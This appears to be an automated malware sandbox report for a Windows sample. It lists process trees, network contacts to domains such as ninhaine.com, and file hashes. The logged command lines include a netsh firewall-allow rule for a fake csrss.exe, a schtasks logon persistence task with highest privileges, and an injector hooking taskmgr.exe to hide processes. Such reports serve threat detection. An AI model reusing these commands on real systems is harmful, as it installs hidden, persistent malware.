N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\6f1f130741c10e884ac91387ba6f1671.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\6f1f130741c10e884ac91387ba6f1671.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\6f1f130741c10e884ac91387ba6f1671.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\6f1f130741c10e884ac91387ba6f1671.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\6f1f130741c10e884ac91387ba6f1671.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\6f1f130741c10e884ac91387ba6f1671.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\6f1f130741c10e884ac91387ba6f1671.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Windows\rss\csrss.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Windows\rss\csrss.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Windows\rss\csrss.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Windows\rss\csrss.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Windows\rss\csrss.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Windows\rss\csrss.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Windows\rss\csrss.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Windows\rss\csrss.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Windows\rss\csrss.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Windows\rss\csrss.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Windows\rss\csrss.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Windows\rss\csrss.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Windows\rss\csrss.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Windows\rss\csrss.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Windows\rss\csrss.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Windows\rss\csrss.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Windows\rss\csrss.exe

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A

GoLang User-Agent

Description Indicator Process Target
HTTP User-Agent header Go-http-client/1.1 N/A N/A
HTTP User-Agent header Go-http-client/1.1 N/A N/A
HTTP User-Agent header Go-http-client/1.1 N/A N/A
HTTP User-Agent header Go-http-client/1.1 N/A N/A

Processes

C:\Users\Admin\AppData\Local\Temp\6f1f130741c10e884ac91387ba6f1671.exe

"C:\Users\Admin\AppData\Local\Temp\6f1f130741c10e884ac91387ba6f1671.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 192 -p 4032 -ip 4032

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4032 -s 368

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 204 -p 4032 -ip 4032

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4032 -s 372

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 4032 -ip 4032

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4032 -s 372

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 424 -p 4032 -ip 4032

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4032 -s 616

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 204 -p 4032 -ip 4032

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4032 -s 704

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 376 -p 4032 -ip 4032

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4032 -s 692

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 4032 -ip 4032

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4032 -s 728

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4032 -s 748

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 4032 -ip 4032

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4032 -s 732

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 4032 -ip 4032

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 4032 -ip 4032

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4032 -s 768

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4032 -s 704

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 4032 -ip 4032

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4032 -s 844

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 4032 -ip 4032

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 4032 -ip 4032

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4032 -s 892

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4032 -s 820

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 4032 -ip 4032

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 4032 -ip 4032

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4032 -s 704

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 4032 -ip 4032

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4032 -s 856

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 4032 -ip 4032

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4032 -s 876

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 4032 -ip 4032

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4032 -s 776

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 4032 -ip 4032

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4032 -s 628

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 4032 -ip 4032

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4032 -s 876

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 4032 -ip 4032

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4032 -s 904

C:\Users\Admin\AppData\Local\Temp\6f1f130741c10e884ac91387ba6f1671.exe

"C:\Users\Admin\AppData\Local\Temp\6f1f130741c10e884ac91387ba6f1671.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 3232 -ip 3232

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3232 -s 332

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 3232 -ip 3232

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3232 -s 352

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 3232 -ip 3232

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3232 -s 352

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 376 -p 3232 -ip 3232

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3232 -s 644

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 3232 -ip 3232

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3232 -s 680

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3232 -s 672

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 3232 -ip 3232

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3232 -s 672

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 3232 -ip 3232

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3232 -s 724

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 3232 -ip 3232

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 3232 -ip 3232

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3232 -s 596

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3232 -s 704

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3232 -s 784

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 3232 -ip 3232

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 3232 -ip 3232

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3232 -s 836

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 3232 -ip 3232

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3232 -s 824

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 3232 -ip 3232

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 3232 -ip 3232

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3232 -s 624

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 3232 -ip 3232

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3232 -s 880

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 592 -p 3232 -ip 3232

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3232 -s 928

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 3232 -ip 3232

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3232 -s 1404

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 588 -p 3232 -ip 3232

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 584 -p 3232 -ip 3232

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3232 -s 1672

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3232 -s 1656

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 600 -p 3232 -ip 3232

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3232 -s 1424

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 3232 -ip 3232

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 3232 -ip 3232

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3232 -s 1504

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3232 -s 1744

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 3232 -ip 3232

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3232 -s 1492

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 3232 -ip 3232

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3232 -s 1420

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3232 -s 1480

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3232 -s 1492

C:\Windows\system32\netsh.exe

netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 3232 -ip 3232

C:\Windows\system32\cmd.exe

C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 3232 -ip 3232

C:\Windows\rss\csrss.exe

C:\Windows\rss\csrss.exe /124-124

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5084 -s 368

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5084 -s 372

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5084 -s 372

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 5084 -ip 5084

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5084 -s 656

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 5084 -ip 5084

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 5084 -ip 5084

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5084 -s 656

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5084 -s 656

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 5084 -ip 5084

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 5084 -ip 5084

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 5084 -ip 5084

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 5084 -ip 5084

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5084 -s 656

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5084 -s 752

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5084 -s 776

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 5084 -ip 5084

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 5084 -ip 5084

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 5084 -ip 5084

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 5084 -ip 5084

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5084 -s 740

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5084 -s 704

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 5084 -ip 5084

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5084 -s 912

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 5084 -ip 5084

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 5084 -ip 5084

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5084 -s 952

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5084 -s 952

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 5084 -ip 5084

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5084 -s 1020

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5084 -s 1040

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 376 -p 5084 -ip 5084

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 5084 -ip 5084

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5084 -s 840

C:\Windows\SYSTEM32\schtasks.exe

schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 5084 -ip 5084

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5084 -s 1096

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5084 -s 1500

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 5084 -ip 5084

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5084 -s 1516

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 5084 -ip 5084

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 204 -p 5084 -ip 5084

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5084 -s 1548

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 5084 -ip 5084

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5084 -s 1516

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5084 -s 1492

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 5084 -ip 5084

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5084 -s 1504

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 5084 -ip 5084

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5084 -s 1600

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 5084 -ip 5084

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5084 -s 1588

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 5084 -ip 5084

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 424 -p 5084 -ip 5084

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5084 -s 1480

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 5084 -ip 5084

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5084 -s 1568

Network

Country Destination Domain Proto
US 8.8.8.8:53 133.211.185.52.in-addr.arpa udp
US 8.8.8.8:53 0.205.248.87.in-addr.arpa udp
US 8.8.8.8:53 71.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 udp
US 8.8.8.8:53 183.142.211.20.in-addr.arpa udp
NL 185.107.56.197:443 tcp
US 8.8.8.8:53 apps.identrust.com udp
GB 96.17.179.184:80 apps.identrust.com tcp
US 8.8.8.8:53 survey-smiles.com udp
US 199.59.243.225:80 survey-smiles.com tcp
US 8.8.8.8:53 184.179.17.96.in-addr.arpa udp
US 8.8.8.8:53 197.56.107.185.in-addr.arpa udp
US 8.8.8.8:53 225.243.59.199.in-addr.arpa udp
US 8.8.8.8:53 ninhaine.com udp
US 8.8.8.8:53 2makestorage.com udp
US 8.8.8.8:53 nisdably.com udp
US 8.8.8.8:53 22f921b0-82cb-4918-9889-6d0f36588c5d.ninhaine.com udp
US 8.8.8.8:53 server3.ninhaine.com udp
CZ 46.8.8.100:443 server3.ninhaine.com tcp
CZ 46.8.8.100:443 server3.ninhaine.com tcp
CZ 46.8.8.100:443 server3.ninhaine.com tcp
US 8.8.8.8:53 ww82.ninhaine.com udp
US 199.59.243.225:80 ww82.ninhaine.com tcp
US 199.59.243.225:80 ww82.ninhaine.com tcp
US 199.59.243.225:80 ww82.ninhaine.com tcp
US 8.8.8.8:53 100.8.8.46.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
US 8.8.8.8:53 18.134.221.88.in-addr.arpa udp
US 8.8.8.8:53 30.243.111.52.in-addr.arpa udp
CZ 46.8.8.100:443 server3.ninhaine.com tcp
US 199.59.243.225:80 ww82.ninhaine.com tcp
US 8.8.8.8:53 104.246.116.51.in-addr.arpa udp

Files

memory/4032-1-0x0000000005040000-0x000000000547E000-memory.dmp

memory/4032-2-0x0000000005480000-0x0000000005DA6000-memory.dmp

memory/4032-3-0x0000000000400000-0x00000000030F3000-memory.dmp

memory/4032-5-0x0000000000400000-0x00000000030F3000-memory.dmp

memory/4032-6-0x0000000005480000-0x0000000005DA6000-memory.dmp

memory/3232-7-0x0000000004F60000-0x00000000053A1000-memory.dmp

memory/3232-8-0x0000000000400000-0x00000000030F3000-memory.dmp

C:\Windows\rss\csrss.exe

MD5 5d40fb25ca390d778ae098c7c2b52851
SHA1 fb16e69f7cce3ca0053a90bbbc107dedebea3352
SHA256 7a5cde889fc76d6cd230a74ed658fb446928b69fdeb458be70be7c28f30f81ad
SHA512 0be767a72d8ee0d4de32209283c6389376a806977e1f1f546eb5ed76720b69c87bb1ed12d667eca53524234de14d529b2cda8e0ddca84d002de162c8fda9ab04

C:\Windows\rss\csrss.exe

MD5 83d7c3ddfb73f9444fc1411864043fa1
SHA1 6ea0a15bb8ac0a86182d06c91024e0c8d54a1eb2
SHA256 4901f67bb729ec47e58a19b5cb0683bcd7c8d073a951eeafd18f37cfb90e8c57
SHA512 1fb0307a468ef35d2c37a0557408006cd4945c41f4fe95a1ffecb5ce8e629adf4f85767868d8a12d6da475219142ed932e7157da797a8b079db4923d6fb2d4ee

memory/3232-16-0x0000000000400000-0x00000000030F3000-memory.dmp

memory/5084-20-0x0000000000400000-0x00000000030F3000-memory.dmp

memory/5084-19-0x0000000005200000-0x0000000005700000-memory.dmp

memory/5084-21-0x0000000000400000-0x00000000030F3000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe

MD5 d98e33b66343e7c96158444127a117f6
SHA1 bb716c5509a2bf345c6c1152f6e3e1452d39d50d
SHA256 5de4e2b07a26102fe527606ce5da1d5a4b938967c9d380a3c5fe86e2e34aaaf1
SHA512 705275e4a1ba8205eb799a8cf1737bc8ba686925e52c9198a6060a7abeee65552a85b814ac494a4b975d496a63be285f19a6265550585f2fc85824c42d7efab5

memory/5084-27-0x0000000005200000-0x0000000005700000-memory.dmp

memory/5084-28-0x0000000000400000-0x00000000030F3000-memory.dmp

memory/5084-29-0x0000000000400000-0x00000000030F3000-memory.dmp

memory/5084-30-0x0000000000400000-0x00000000030F3000-memory.dmp

memory/5084-31-0x0000000000400000-0x00000000030F3000-memory.dmp

memory/5084-32-0x0000000000400000-0x00000000030F3000-memory.dmp

memory/5084-33-0x0000000000400000-0x00000000030F3000-memory.dmp

memory/5084-34-0x0000000000400000-0x00000000030F3000-memory.dmp

memory/5084-35-0x0000000000400000-0x00000000030F3000-memory.dmp

memory/5084-36-0x0000000000400000-0x00000000030F3000-memory.dmp

memory/5084-37-0x0000000000400000-0x00000000030F3000-memory.dmp

memory/5084-38-0x0000000000400000-0x00000000030F3000-memory.dmp

memory/5084-39-0x0000000000400000-0x00000000030F3000-memory.dmp

memory/5084-40-0x0000000000400000-0x00000000030F3000-memory.dmp